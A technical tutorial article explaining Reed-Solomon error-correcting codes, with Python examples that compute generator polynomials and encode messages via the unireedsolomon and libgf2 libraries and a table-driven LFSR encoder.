stringInputSize = strlen(userInputArray);
|
https://kodlogs.com/34535/assign-the-size-of-userinput-to-stringsize-ex-if-userinput-hello-output-is
|
CC-MAIN-2021-10
|
refinedweb
| 191
| 59.94
|
Unresolved tag 'trans' Follow Leo Trubach Created July 05, 2011 18:20 Hi!When editing my template i get error "unresolved tag 'trans'", but this tag works when i run development server.How do i fix it?Thank you.
Any ideas about this?
Hello Leo,
Do you have {% load i18n %} in the template where you use the 'trans' tag?
--
Dmitry Jemerov
Development Lead
JetBrains, Inc.
"Develop with Pleasure!"
Yes, i have the following lines in my template
{% extends "base.html" %}
{% load i18n %}
and if i press Ctrl Key and click on i18n c:\python27\Lib\site-packages\django\templatetags\i18n.py file is opened, and i can find there the following lines
...
@register.tag("trans")
def do_translate(parser, token):
...
added issue on YouTrack
|
https://intellij-support.jetbrains.com/hc/en-us/community/posts/206589635-Unresolved-tag-trans-
|
CC-MAIN-2020-45
|
refinedweb
| 123
| 70.9
|
Linear overwhelming abundance to correct short bursts of errors. We’ll see that encoding a message using Reed-Solomon is fairly simple, so easy that we can even do it in C on an embedded system.
We’re also going to talk about some performance metrics of error-correcting codes.
Reed-Solomon Codes
Reed-Solomon codes, like many other error-correcting codes, are parameterized. A Reed-Solomon \( (n,k) \) code, where \( n=2^m-1 \) and \( k=n-2t \), can correct up to \( t \) errors. They are not binary codes; each symbol must have \( 2^m \) possible values, and is typically an element of \( GF(2^m) \).
The Reed-Solomon codes with \( n=255 \) are very common, since then each symbol is an element of \( GF(2^8) \) and can be represented as a single byte. A \( (255, 247) \) RS code would be able to correct 4 errors, and a \( (255,223) \) RS code would be able to correct 16 errors, with each error being an arbitrary error in one transmitted symbol.
You may have noticed a pattern in some of the coding techniques discussed in the previous article:
- If we compute the parity of a string of bits, and concatenate a parity bit, the resulting message has a parity of zero modulo 2
- If we compute the checksum of a string of bytes, and concatenate a negated checksum, the resulting message has a checksum of zero modulo 256
- If we compute the CRC of a message (with no initial/final bit flips), and concatenate the CRC, the resulting message has a remainder of zero modulo the CRC polynomial
- If we compute parity bits of a Hamming code, and concatenate them to the data bits, the resulting message has a remainder of zero modulo the Hamming code polynomial
In all cases, we have this magic technique of taking data bits, using a division algorithm to compute the remainder, and concatenating the remainder, such that the resulting message has zero remainder. If we receive a message which does have a nonzero remainder, we can detect this, and in some cases use the nonzero remainder to determine where the errors occurred and correct them.
Parity and checksum are poor methods because they are unable to detect transpositions. It’s easy to cancel out a parity flip; it’s much harder to cancel out a CRC error by accidentally flipping another bit elsewhere.
What if there was an encoding algorithm that was somewhat similar to a checksum, in that it operated on a byte-by-byte basis, but had robustness to swapped bytes? Reed-Solomon is such an algorithm. And it amounts to doing the same thing as all the other linear coding techniques we’ve talked about to encode a message:
- take data bits
- use a polynomial division algorithm to compute a remainder
- create a codeword by concatenating the data bits and the remainder bits
- a valid codeword now has a zero remainder
In this article, I am going to describe Reed-Solomon encoding, but not the typical decoding methods, which are somewhat complicated, and include fancy-sounding steps like the Berlekamp-Massey algorithm (yes, this is the same one we saw in part VI, only it’s done in \( GF(2^m) \) instead of the binary \( GF(2) \) version), the Chien search, and the Forney algorithm. If you want to learn more, I would recommend reading the BBC white paper WHP031, in the list of references, which does go into just the right level of detail, and has lots of examples.
In addition to being more complicated to understand, decoding is also more computationally intensive. Reed-Solomon encoders are straightforward to implement in hardware — which we’ll see a bit later — and are simple to implement in software in an embedded system. Decoders are trickier, and you’d probably want something more powerful than an 8-bit microcontroller to execute them, or they’ll be very slow. The first use of Reed-Solomon in space communications was on the Voyager missions, where an encoder was included without certainty that the received signals could be decoded back on earth. From a NASA Tutorial on Reed-Solomon Error Correction Coding by William A. Geisel:
The Reed-Solomon (RS) codes have been finding widespread applications ever since the 1977 Voyager’s deep space communications system. At the time of Voyager’s launch, efficient encoders existed, but accurate decoding methods were not even available! The Jet Propulsion Laboratory (JPL) scientists and engineers gambled that by the time Voyager II would reach Uranus in 1986, decoding algorithms and equipment would be both available and perfected. They were correct! Voyager’s communications system was able to obtain a data rate of 21,600 bits per second from 2 billion miles away with a received signal energy 100 billion times weaker than a common wrist watch battery!
The statement “accurate decoding methods were not even available” in 1977 is a bit suspicious, although this general idea of faith-that-a-decoder-could-be-constructed is in several other accounts:
Lahmeyer, the sole engineer on the project, and his team of technicians and builders worked tirelessly to get the decoder working by the time Voyager reached Uranus. Otherwise, they would have had to slow down the rate of data received to decrease noise interference. “Each chip had to be hand wired,” Lahmeyer says. “Thankfully, we got it working on time.”
(Jefferson City Magazine, June 2015)
In order to make the extended mission to Uranus and Neptune possible, some new and never-before-tried technologies had to be designed into the spacecraft and novel new techniques for using the hardware to its fullest had to be validated for use. One notable requirement was the need to improve error correction coding of the data stream over the very inefficient method which had been used for all previous missions (and for the Voyagers at Jupiter and Saturn), because the much lower maximum data rates from Uranus and Neptune (due to distance) would have greatly compromised the number of pictures and other data that could have been obtained. A then-new and highly efficient data coding method called Reed-Solomon (RS) coding was planned for Voyager at Uranus, and the coding device was integrated into the spacecraft design. The problem was that although RS coding is easy to do and the encoding device was relatively simple to make, decoding the data after receipt on the ground is so mathematically intensive that no computer on Earth was able to handle the decoding task at the time Voyager was designed – or even launched. The increase of data throughput using the RS coder was about a factor of three over the old, standard Golay coding, so including the capability was considered highly worthwhile. It was assumed that a decoder could be developed by the time Voyager needed it at Uranus. Such was the case, and today RS coding is routinely used in CD players and many other common household electronic devices.
(Sirius Astronomer, August 2017)
Geisel probably meant “efficient” rather than “accurate”; decoding algorithms were well-known before a NASA report in 1978 which states
These codes were first described by I. S. Reed and G. Solomon in 1960. A systematic decoding algorithm was not discovered until 1968 by E. Berlekamp. Because of their complexity, the RS codes are not widely used except when no other codes are suitable.
Details of Reed-Solomon Encoding
At any rate, with Reed-Solomon, we have a polynomial, but instead of the coefficients being
0 or
1 like our usual polynomials in \( GF(2)[x] \), this time the coefficients are elements of \( GF(2^m) \). A byte-oriented Reed-Solomon encoding uses \( GF(2^8) \). The polynomial used in Reed-Solomon is usually written as \( g(x) \), the generator polynomial, with
$$g(x) = (x+\lambda^b)(x+\lambda^{b+1})(x+\lambda^{b+2})\ldots (x+\lambda^{b+n-k-1})$$
where \( \lambda \) is a primitive element of \( GF(2^m) \) and \( b \) is some constant, usually 0 or 1 or \( -t \). This means the polynomial’s roots are successive powers of \( \lambda \), and that makes the math work out just fine.
All we do is treat the message as a polynomial \( M(x) \), calculate a remainder \( r(x) = x^{n-k} M(x) \bmod g(x) \), and then concatenate it to the message; the resulting codeword \( C(x) = x^{n-k}M(x) + r(x) \), is guaranteed to be a multiple of the generator polynomial \( g(x) \). At the receiving end, we calculate \( C(x) \bmod g(x) \) and if it’s zero, everything’s great; otherwise we have to do some gory math, but this allows us to find and correct errors in up to \( t \) symbols.
That probably sounds rather abstract, so let’s work through an example.
Reed-Solomon in Python
We’re going to encode some messages using Reed-Solomon in two ways, first using the
unireedsolomon library, and then from scratch using
libgf2. If you’re going to use a library, you’ll need to be really careful; the library should be universal, meaning you can encode or decode any particular flavor of Reed-Solomon — like the CRC, there are many possible variants, and you need to be able to specify the polynomial of the Galois field used for each symbol, along with the generator element \( \lambda \) and the initial power \( b \). If anyone tells you they’re using the Reed-Solomon \( (255,223) \) code, they’re smoking something funny, because there’s more than one, and you need to know which particular variant in order to communicate properly.
There are two examples in the BBC white paper:
- one using \( RS(15,11) \) for 4-bit symbols, with symbol field \( GF(2)[y]/(y^4 + y + 1) \); for the generator, \( \lambda = y = {\tt 2} \) and \( b=0 \), forming the generator polynomial
$$\begin{align} g(x) &= (x+1)(x+\lambda)(x+\lambda^2)(x+\lambda^3) \cr &= x^4 + \lambda^{12}x^3 + \lambda^{4}x^2 + x + \lambda^6 \cr &= x^4 + 15x^3 + 3x^2 + x + 12 \cr &= x^4 + {\tt F} x^3 + {\tt 3}x^2 + {\tt 1}x + {\tt 12} \end{align}$$
- another using the DVB-T specification that uses \( RS(255,239) \) for 8-bit symbols, with symbol field \( GF(2)[y]/(y^8 + y^4 + y^3 + y^2 + 1) \) (hex representation
11d) and for the generator, \( \lambda = y = {\tt 2} \) and \( b=0 \), forming the generator polynomial
$$\begin{align} g(x) &= (x+1)(x+\lambda)(x+\lambda^2)(x+\lambda^3)\ldots(x+\lambda^{15}) \cr &= x^{16} + \lambda^{12}x^3 + \lambda^{4}x^2 + x + \lambda^6 \cr &= x^{16} + 59x^{15} + 13x^{14} + 104x^{13} + 189x^{12} + 68x^{11} + 209x^{10} + 30x^9 + 8x^8 \cr &\qquad + 163x^7 + 65x^6 + 41x^5 + 229x^4 + 98x^3 + 50x^2 + 36x + 59 \cr &= x^{16} + {\tt 3B} x^{15} + {\tt 0D}x^{14} + {\tt 68}x^{13} + {\tt BD}x^{12} + {\tt 44}x^{11} + {\tt d1}x^{10} + {\tt 1e}x^9 + {\tt 08}x^8\cr &\qquad + {\tt A3}x^7 + {\tt 41}x^6 + {\tt 29}x^5 + {\tt E5}x^4 + {\tt 62}x^3 + {\tt 32}x^2 + {\tt 24}x + {\tt 3B} \end{align}$$
In
unireedsolomon, the
RSCoder class is used, with these parameters:
c_exp— this is the number of bits per symbol, 4 and 8 for our two examples
prim— this is the symbol field polynomial, 0x13 and 0x11d for our two examples
generator— this is the generator element in the symbol field, 0x2 for both examples
fcr— this is the “first consecutive root” \( b \), with \( b=0 \) for both examples
You can verify the generator polynomial by encoding the message \( M(x) = 1 \), all zero symbols with a trailing one symbol at the end; this will create a codeword \( C(x) = x^{n-k} + r(x) = g(x) \).
Let’s do it!
import unireedsolomon as rs def codeword_symbols(msg): return [ord(c) for c in msg] def find_generator(rscoder): """ Returns the generator polynomial of an RSCoder class """ msg = [0]*(rscoder.k - 1) + [1] degree = rscoder.n - rscoder.k codeword = rscoder.encode(msg) # look at the trailing elements of the codeword return codeword_symbols(codeword[(-degree-1):]) rs4 = rs.RSCoder(15,11,generator=2,prim=0x13,fcr=0,c_exp=4) print "g4(x) = %s" % find_generator(rs4) rs8 = rs.RSCoder(255,239,generator=2,prim=0x11d,fcr=0,c_exp=8) print "g8(x) = %s" % find_generator(rs8)
g4(x) = [1, 15, 3, 1, 12] g8(x) = [1, 59, 13, 104, 189, 68, 209, 30, 8, 163, 65, 41, 229, 98, 50, 36, 59]
Easy as pie!
Encoding messages is just a matter of using either a string (byte array) or a list of message symbols, and we get a string back by default. (You can use
encode(msg, return_string=False) but then you get a bunch of
GF2Int objects back rather than integer coefficients.)
(Warning: the unireedsolomon package uses a global singleton to manage Galois field arithmetic, so if you want to have multiple
RSCoder objects out there, they’ll only work if they share the same field generator polynomial. This is why each time I want to switch back between the 4-bit and the 8-bit
RSCoder, I have to create a new object, so that it reconfigures the way Galois field arithmetic works.)
The BBC white paper has a sample encoding only for the 4-bit \( RS(15,11) \) example, using \( [1,2,3,4,5,6,7,8,9,10,11] \) which produces remainder \( [3,3,12,12] \):
rs4 = rs.RSCoder(15,11,generator=2,prim=0x13,fcr=0,c_exp=4) encmsg15 = codeword_symbols(rs4.encode([1,2,3,4,5,6,7,8,9,10,11])) print "RS(15,11) encoded example message from BBC WHP031:\n", encmsg15
RS(15,11) encoded example message from BBC WHP031: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 3, 3, 12, 12]
The real fun begins when we can start encoding actual messages, like
Ernie, you have a banana in your ear! Since this has length 37, let’s use a shortened version of the code, \( RS(53,37) \).
Mama’s Little Baby Loves Shortnin’, Shortnin’, Mama’s Little Baby Loves Shortnin’ Bread
Oh, we haven’t talked about shortened codes yet — this is where we just omit the initial symbols in a codeword, and both transmitter and receiver agree treat them as implied zeros. An eight-bit \( RS(53,37) \) transmitter encodes as codeword polynomials of degree 52, and the receiver just zero-extends them to degree 254 (with 202 implied zero bytes added at the beginning) for the purposes of decoding just like any other \( RS(255,239) \) code.
rs8s = rs.RSCoder(53,37,generator=2,prim=0x11d,fcr=0,c_exp=8) msg = 'Ernie, you have a banana in your ear!' codeword = rs8s.encode(msg) print ('codeword=%r' % codeword) remainder = codeword[-16:] print ('remainder(hex) = %s' % remainder.encode('hex'))
codeword='Ernie, you have a banana in your ear!U,\xa3\xb4d\x00:R\xc4P\x11\xf4n\x0f\xea\x9b' remainder(hex) = 552ca3b464003a52c45011f46e0fea9b
That binary stuff after the message is the remainder. Now we can decode all sorts of messages with errors:
for init_msg in [ 'Ernie, you have a banana in your ear!', 'Billy! You have a banana in your ear!', 'Arnie! You have a potato in your ear!', 'Eddie? You hate a banana in your car?', '01234567ou have a banana in your ear!', '012345678u have a banana in your ear!', ]: decoded_msg, decoded_remainder = rs8s.decode(init_msg+remainder) print "%s -> %s" % (init_msg, decoded_msg)
Ernie, you have a banana in your ear! -> Ernie, you have a banana in your ear! Billy! You have a banana in your ear! -> Ernie, you have a banana in your ear! Arnie! You have a potato in your ear! -> Ernie, you have a banana in your ear! Eddie? You hate a banana in your car? -> Ernie, you have a banana in your ear! 01234567ou have a banana in your ear! -> Ernie, you have a banana in your ear!
--------------------------------------------------------------------------- RSCodecError Traceback (most recent call last)
in () 7 '012345678u have a banana in your ear!', 8 ]: ----> 9 decoded_msg, decoded_remainder = rs8s.decode(init_msg+remainder) 10 print "%s -> %s" % (init_msg, decoded_msg) /Users/jmsachs/anaconda/lib/python2.7/site-packages/unireedsolomon/rs.pyc in decode(self, r, nostrip, k, erasures_pos, only_erasures, return_string) 321 # being the rightmost byte 322 # X is a corresponding array of GF(2^8) values where X_i = alpha^(j_i) --> 323 X, j = self._chien_search(sigma) 324 325 # Sanity check: Cannot guarantee correct decoding of more than n-k errata (Singleton Bound, n-k being the minimum distance), and we cannot even check if it's correct (the syndrome will always be all 0 if we try to decode above the bound), thus it's better to just return the input as-is. /Users/jmsachs/anaconda/lib/python2.7/site-packages/unireedsolomon/rs.pyc in _chien_search(self, sigma) 822 errs_nb = len(sigma) - 1 # compute the exact number of errors/errata that this error locator should find 823 if len(j) != errs_nb: --> 824 raise RSCodecError("Too many (or few) errors found by Chien Search for the errata locator polynomial!") 825 826 return X, j RSCodecError: Too many (or few) errors found by Chien Search for the errata locator polynomial!
This last message failed to decode because there were 9 errors and \( RS(53,37) \) or \( RS(255,239) \) can only correct 8 errors.
But if there are few enough errors, Reed-Solomon will fix them all.
Why does it work?
The reason why Reed-Solomon encoding and decoding works is a bit hard to grasp. There are quite a few good explanations of how encoding and decoding works, my favorite being the BBC whitepaper, but none of them really dwells upon why it works. We can handwave about redundancy and the mysteriousness of finite fields spreading that redundancy evenly throughout the remainder bits, or a spectral interpretation of the parity-check matrix where the roots of the generator polynomial can be considered as “frequencies”, but I don’t have a good explanation. Here’s the best I can do:
Let’s say we have some number of errors where the locations are known. This is called an erasure, in contrast to a true error, where the location is not known ahead of time. Think of a bunch of symbols on a piece of paper, and some idiot erases one of them or spills vegetable soup, and you’ve lost one of the symbols, but you know where it is. The message received could be
45 72 6e 69 65 2c 20 ?? 6f 75 where the
?? represents an erasure. Of course, binary computers don’t have a way to compute arithmetic on
??, so what we would do instead is just pick an arbitrary pattern like
00 or
42 to replace the erasure, and mark its position (in this case, byte 7) for later processing.
Anyway, in a Reed-Solomon code, the error values are linearly independent. This is really the key here. We can have up to \( 2t \) erasures (as opposed to \( t \) true errors) and still maintain this linear independence property. Linear independence means that for a system of equations, there is only one solution. An error in bytes 3 and 28, for example, can’t be mistaken for an error in bytes 9 and 14. Once you exceed the maximum number of errors or erasures, the linear independence property falls apart and there are many possible ways to correct received errors, so we can’t be sure which is the right one.
To get a little more technical: we have a transmitted coded message \( C_t(x) = x^{n-k}M(x) + r(x) \) where \( M(x) \) is the unencoded message and \( r(x) \) is the remainder modulo the generator polynomial \( g(x) \), and a received message \( C_r(x) = C_t(x) + e(x) \) where the error polynomial \( e(x) \) represents the difference between transmitted and received messages. The receiver can compute \( e(x) \bmod g(x) \) by calculating the remainder \( C_r(x) \bmod g(x) \). If there are no errors, then \( e(x) \bmod g(x) = 0 \). With erasures, we know the locations of the errors. Let’s say we had \( n=255 \), \( 2t=16 \), and we had three errors at known locations \( i_1, i_2, \) and \( i_3, \) in which case \( e(x) = e_{i_1}x^{i_1} + e_{i_2}x^{i_2} + e_{i_3}x^{i_3} \). These terms \( e_{i_1}x^{i_1}, e_{i_2}x^{i_2}, \) etc. are the error values that form a linear independent set. For example, if the original message had
42 in byte 13, but we received
59 instead, then the error coefficient in that location would be
42 + 59 = 1B, so \( i_1 = 13 \) and the error value would be \( {\tt 1B}x^{13} \).
What the algebra of finite fields assures us, is that if we have a suitable choice of generator polynomial \( g(x) \) of degree \( 2t \) — and the one used for Reed-Solomon, \( g(x) = \prod\limits_{i=0}^{2t-1}(x-\lambda^{b+i}) \), is suitable — then any selection of up to \( 2t \) distinct powers of \( x \) from \( x^0 \) to \( x^{n-1} \) are linearly independent. If \( 2t = 16 \), for example, then we cannot write \( x^{15} = ax^{13} + bx^{8} + c \) for some choices of \( a,b,c \) — otherwise it would mean that \( x^{15}, x^{13}, x^8, \) and \( 1 \) do not form a linearly independent set. This means that if we have up to \( 2t \) erasures at known locations, then we can figure out the coefficients at each location, and find the unknown values.
In our 3-erasures example above, if \( 2t=16, i_1 = 13, i_2 = 8, i_3 = 0 \), then we have a really easy case. All the errors are in positions below the degree of the remainder, which means all the errors are in the remainder, and the message symbols arrived intact. In this case, the error polynomial looks like \( e(x) = e_{13}x^{13} + e_8x^8 + e_0 \) for some error coefficients \( e_{13}, e_8, e_0 \) in \( GF(256) \). The received remainder \( e(x) \bmod g(x) = e(x) \) and we can just find the error coefficients directly.
On the other hand, let’s say we knew the errors were in positions \( i_1 = 200, i_2 = 180, i_3 = 105 \). In this case we could calculate \( x^{200} \bmod g(x) \), \( x^{180} \bmod g(x) \), and \( x^{105} \bmod g(x) \). These each have a bunch of coefficients from degree 0 to 15, but we know that the received remainder \( e(x) \bmod g(x) \) must be a linear combination of the three polynomials, \( e_{200}x^{200} + e_{180}x^{180} + e_{105}x^{105} \bmod g(x) \) and we could solve for \( e_{200} \), \( e_{180} \), and \( e_{105} \) using linear algebra.
A similar situation applies if we have true errors where we don’t know their positions ahead of time. In this case we can correct only \( t \) errors, but the algebra works out so that we can write \( 2t \) equations with \( 2t \) unknowns (an error location and value for each of the \( t \) errors) and solve them.
All we need is for someone to prove this linear independence property. That part I won’t be able to explain intuitively. If you look at the typical decoder algorithms, they will show constructively how to find the unique solution, but not why it works. Reed-Solomon decoders make use of the so-called “key equation”; for Euclidean algorithm decoders (as opposed to Berlekamp-Massey decoders), the key equation is \( \Omega(x) = S(x)\Lambda(x) \bmod x^{2t} \) and you’re supposed to know what that means and how to use it… sigh. A bit of blind faith sometimes helps.
Which is why I won’t have anything more to say on decoding. Read the BBC whitepaper.
Reed-Solomon Encoding in
libgf2
We don’t have to use the
unireedsolomon library as a black box. We can do the encoding step in
libgf2 using
libgf2.lfsr.PolyRingOverField. This is a helper class that the
undecimate() function uses. I talked a little bit about this in part XI, along with some of the details of this “two-variable” kind of mathematical thing, a polynomial ring over a finite field. Let’s forget about the abstract math for now, and just start computing. The
PolyRingOverField just defines a particular arithmetic of polynomials, represented as lists of coefficients in ascending order (so \( x^2 + 2 \) is represented as
[2, 0, 1]):
from libgf2.gf2 import GF2QuotientRing, GF2Polynomial from libgf2.lfsr import PolyRingOverField import numpy as np f16 = GF2QuotientRing(0x13) f256 = GF2QuotientRing(0x11d) rsprof16 = PolyRingOverField(f16) rsprof256 = PolyRingOverField(f256) p1 = [1,4] p2 = [2,8] rsprof256.mul(p1, p2)
[2, 0, 32]
def compute_generator_polynomial(rsprof, elementfield, k): el = 1 g = [1] n = (1 << elementfield.degree) - 1 for _ in xrange(n-k): g = rsprof.mul(g, [el, 1]) el = elementfield.mulraw(el, 2) return g g16 = compute_generator_polynomial(rsprof16, f16, 11) g256 = compute_generator_polynomial(rsprof256, f256, 239) print "generator polynomials (in ascending order of coefficients)" print "RS(15,11): g16=", g16 print "RS(255,239): g256=", g256
generator polynomials (in ascending order of coefficients) RS(15,11): g16= [12, 1, 3, 15, 1] RS(255,239): g256= [59, 36, 50, 98, 229, 41, 65, 163, 8, 30, 209, 68, 189, 104, 13, 59, 1]
Now, to encode a message, we just have to convert binary data to polynomials and then take the remainder \( \bmod g(x) \):
print "BBC WHP031 example for RS(15,11):" msg_bbc = [1,2,3,4,5,6,7,8,9,10,11] msgpoly = [0]*4 + [c for c in reversed(msg_bbc)] print "message=%r" % msg_bbc q,r = rsprof16.divmod(msgpoly, g16) print "remainder=", r print "\nReal-world example for RS(255,239):" print "message=%r" % msg msgpoly = [0]*16 + [ord(c) for c in reversed(msg)] q,r = rsprof256.divmod(msgpoly, g256) print "remainder=", r print "in hex: ", ''.join('%02x' % b for b in reversed(r)) print "remainder calculated earlier:\n %s" % remainder.encode('hex')
BBC WHP031 example for RS(15,11): message=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11] remainder= [12, 12, 3, 3] Real-world example for RS(255,239): message='Ernie, you have a banana in your ear!' remainder= [155, 234, 15, 110, 244, 17, 80, 196, 82, 58, 0, 100, 180, 163, 44, 85] in hex: 552ca3b464003a52c45011f46e0fea9b remainder calculated earlier: 552ca3b464003a52c45011f46e0fea9b
See how easy that is?
Well… you probably didn’t, because
PolyRingOverField hides the implementation of the abstract algebra. We can make the encoding step even easier to understand if we take the perspective of an LFSR.
Chocolate Strawberry Peach Vanilla Banana Pistachio Peppermint Lemon Orange Butterscotch
We can handle Reed-Solomon encoding in either software or hardware (and at least the remainder-calculating part of the decoder) using LFSRs. Now, we have to loosen up what we mean by an LFSR. So far, all the LFSRs have dealt directly with binary bits, and each shift cell either has a tap, or doesn’t, depending on the coefficients of the polynomial associated with the LFSR. For Reed-Solomon, the units of computation are elements of \( GF(256) \), represented as 8-bit bytes for a particular degree-8 primitive polynomial. So the shift cells, instead of containing bits, will contain bytes, and the taps will change from simple taps to multipliers over \( GF(256) \). (This gets a little hairy in hardware, but it’s not that bad.) A 10-byte LFSR over \( GF(256) \) implementing Reed-Solomon encoding would look something like this:
We would feed the bytes \( b[k] \) of the message in at the right; bytes \( r_0 \) through \( r_9 \) represent a remainder, and coefficients \( p_0 \) through \( p_9 \) represent the non-leading coefficients of the RS code’s generator polynomial. In this case, we would use a 10th-degree generator polynomial with a leading coefficient 1.
For each new byte, we do two things:
- Shift all cells left, shifting in one byte of the message
- Take the byte shifted out, and multiply it by the generator polynomial, then add (XOR) with the contents of the shift register.
We also have to remember to do this another \( n-k \) times (the length of the shift register) to cover the \( x^{n-k} \) factor. (Remember, we’re trying to calculate \( r(x) = x^{n-k}M(x) \).)
f256 = GF2QuotientRing(0x11d) def rsencode_lfsr1(field, message, gtaps, remainder_only=False): """ encode a message in Reed-Solomon using LFSR field: symbol field message: string of bytes gtaps: generator polynomial coefficients, in ascending order remainder_only: whether to return the remainder only """ glength = len(gtaps) remainder = np.zeros(glength, np.int) for char in message + '\0'*glength: remainder = np.roll(remainder, 1) out = remainder[0] remainder[0] = ord(char) for k, c in enumerate(gtaps): remainder[k] ^= field.mulraw(c, out) remainder = ''.join(chr(b) for b in reversed(remainder)) return remainder if remainder_only else message+remainder print rsencode_lfsr1(f256, msg, g[:-1],
That worked, but we still have to handle multiplication in the symbol field, which is annoying and cumbersome for embedded processors. There are two table-driven methods that make this step easier, relegating the finite field stuff either to initialization steps only, or something that can be done at design time if you’re willing to generate a table in source code. (For example, using Python to generate the table coefficients in C.)
Also we have that call to
np.roll(), which is too high-level for a language like C, so let’s look at things from this low-level, table-driven approach.
One table method is to take the generator polynomial and multiply it by each of the 256 possible coefficients, so that we get a table of 256 × \( n-k \) bytes.
def rsencode_lfsr2_table(field, gtaps): """ Create a table for Reed-Solomon encoding using a field This time the taps are in *descending* order """ return [[field.mulraw(b,c) for c in gtaps] for b in xrange(256)] def rsencode_lfsr2(table, message, remainder_only=False): """ encode a message in Reed-Solomon using LFSR table: table[i][j] is the multiplication of generator coefficient of x^{n-k-1-j} by incoming byte i message: string of bytes remainder_only: whether to return the remainder only """ glength = len(table[0]) remainder = [0]*glength for char in message + '\0'*glength: out = remainder[0] table_row = table[out] for k in xrange(glength-1): remainder[k] = remainder[k+1] ^ table_row[k] remainder[glength-1] = ord(char) ^ table_row[glength-1] remainder = ''.join(chr(b) for b in remainder) return remainder if remainder_only else message+remainder table = rsencode_lfsr2_table(f256, g[-2::-1]) print "table:" for k, row in enumerate(table): print "%02x: %s" % (k, ' '.join('%02x' % c for c in row))
table: 00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01: 3b 0d 68 bd 44 d1 1e 08 a3 41 29 e5 62 32 24 3b 02: 76 1a d0 67 88 bf 3c 10 5b 82 52 d7 c4 64 48 76 03: 4d 17 b8 da cc 6e 22 18 f8 c3 7b 32 a6 56 6c 4d 04: ec 34 bd ce 0d 63 78 20 b6 19 a4 b3 95 c8 90 ec 05: d7 39 d5 73 49 b2 66 28 15 58 8d 56 f7 fa b4 d7 06: 9a 2e 6d a9 85 dc 44 30 ed 9b f6 64 51 ac d8 9a 07: a1 23 05 14 c1 0d 5a 38 4e da df 81 33 9e fc a1 08: c5 68 67 81 1a c6 f0 40 71 32 55 7b 37 8d 3d c5 09: fe 65 0f 3c 5e 17 ee 48 d2 73 7c 9e 55 bf 19 fe 0a: b3 72 b7 e6 92 79 cc 50 2a b0 07 ac f3 e9 75 b3 0b: 88 7f df 5b d6 a8 d2 58 89 f1 2e 49 91 db 51 88 0c: 29 5c da 4f 17 a5 88 60 c7 2b f1 c8 a2 45 ad 29 0d: 12 51 b2 f2 53 74 96 68 64 6a d8 2d c0 77 89 12 0e: 5f 46 0a 28 9f 1a b4 70 9c a9 a3 1f 66 21 e5 5f 0f: 64 4b 62 95 db cb aa 78 3f e8 8a fa 04 13 c1 64 10: 97 d0 ce 1f 34 91 fd 80 e2 64 aa f6 6e 07 7a 97 11: ac dd a6 a2 70 40 e3 88 41 25 83 13 0c 35 5e ac 12: e1 ca 1e 78 bc 2e c1 90 b9 e6 f8 21 aa 63 32 e1 13: da c7 76 c5 f8 ff df 98 1a a7 d1 c4 c8 51 16 da 14: 7b e4 73 d1 39 f2 85 a0 54 7d 0e 45 fb cf ea 7b 15: 40 e9 1b 6c 7d 23 9b a8 f7 3c 27 a0 99 fd ce 40 16: 0d fe a3 b6 b1 4d b9 b0 0f ff 5c 92 3f ab a2 0d 17: 36 f3 cb 0b f5 9c a7 b8 ac be 75 77 5d 99 86 36 18: 52 b8 a9 9e 2e 57 0d c0 93 56 ff 8d 59 8a 47 52 19: 69 b5 c1 23 6a 86 13 c8 30 17 d6 68 3b b8 63 69 1a: 24 a2 79 f9 a6 e8 31 d0 c8 d4 ad 5a 9d ee 0f 24 1b: 1f af 11 44 e2 39 2f d8 6b 95 84 bf ff dc 2b 1f 1c: be 8c 14 50 23 34 75 e0 25 4f 5b 3e cc 42 d7 be 1d: 85 81 7c ed 67 e5 6b e8 86 0e 72 db ae 70 f3 85 1e: c8 96 c4 37 ab 8b 49 f0 7e cd 09 e9 08 26 9f c8 1f: f3 9b ac 8a ef 5a 57 f8 dd 8c 20 0c 6a 14 bb f3 20: 33 bd 81 3e 68 3f e7 1d d9 c8 49 f1 dc 0e f4 33 21: 08 b0 e9 83 2c ee f9 15 7a 89 60 14 be 3c d0 08 22: 45 a7 51 59 e0 80 db 0d 82 4a 1b 26 18 6a bc 45 23: 7e aa 39 e4 a4 51 c5 05 21 0b 32 c3 7a 58 98 7e 24: df 89 3c f0 65 5c 9f 3d 6f d1 ed 42 49 c6 64 df 25: e4 84 54 4d 21 8d 81 35 cc 90 c4 a7 2b f4 40 e4 26: a9 93 ec 97 ed e3 a3 2d 34 53 bf 95 8d a2 2c a9 27: 92 9e 84 2a a9 32 bd 25 97 12 96 70 ef 90 08 92 28: f6 d5 e6 bf 72 f9 17 5d a8 fa 1c 8a eb 83 c9 f6 29: cd d8 8e 02 36 28 09 55 0b bb 35 6f 89 b1 ed cd 2a: 80 cf 36 d8 fa 46 2b 4d f3 78 4e 5d 2f e7 81 80 2b: bb c2 5e 65 be 97 35 45 50 39 67 b8 4d d5 a5 bb 2c: 1a e1 5b 71 7f 9a 6f 7d 1e e3 b8 39 7e 4b 59 1a 2d: 21 ec 33 cc 3b 4b 71 75 bd a2 91 dc 1c 79 7d 21 2e: 6c fb 8b 16 f7 25 53 6d 45 61 ea ee ba 2f 11 6c 2f: 57 f6 e3 ab b3 f4 4d 65 e6 20 c3 0b d8 1d 35 57 30: a4 6d 4f 21 5c ae 1a 9d 3b ac e3 07 b2 09 8e a4 31: 9f 60 27 9c 18 7f 04 95 98 ed ca e2 d0 3b aa 9f 32: d2 77 9f 46 d4 11 26 8d 60 2e b1 d0 76 6d c6 d2 33: e9 7a f7 fb 90 c0 38 85 c3 6f 98 35 14 5f e2 e9 34: 48 59 f2 ef 51 cd 62 bd 8d b5 47 b4 27 c1 1e 48 35: 73 54 9a 52 15 1c 7c b5 2e f4 6e 51 45 f3 3a 73 36: 3e 43 22 88 d9 72 5e ad d6 37 15 63 e3 a5 56 3e 37: 05 4e 4a 35 9d a3 40 a5 75 76 3c 86 81 97 72 05 38: 61 05 28 a0 46 68 ea dd 4a 9e b6 7c 85 84 b3 61 39: 5a 08 40 1d 02 b9 f4 d5 e9 df 9f 99 e7 b6 97 5a 3a: 17 1f f8 c7 ce d7 d6 cd 11 1c e4 ab 41 e0 fb 17 3b: 2c 12 90 7a 8a 06 c8 c5 b2 5d cd 4e 23 d2 df 2c 3c: 8d 31 95 6e 4b 0b 92 fd fc 87 12 cf 10 4c 23 8d 3d: b6 3c fd d3 0f da 8c f5 5f c6 3b 2a 72 7e 07 b6 3e: fb 2b 45 09 c3 b4 ae ed a7 05 40 18 d4 28 6b fb 3f: c0 26 2d b4 87 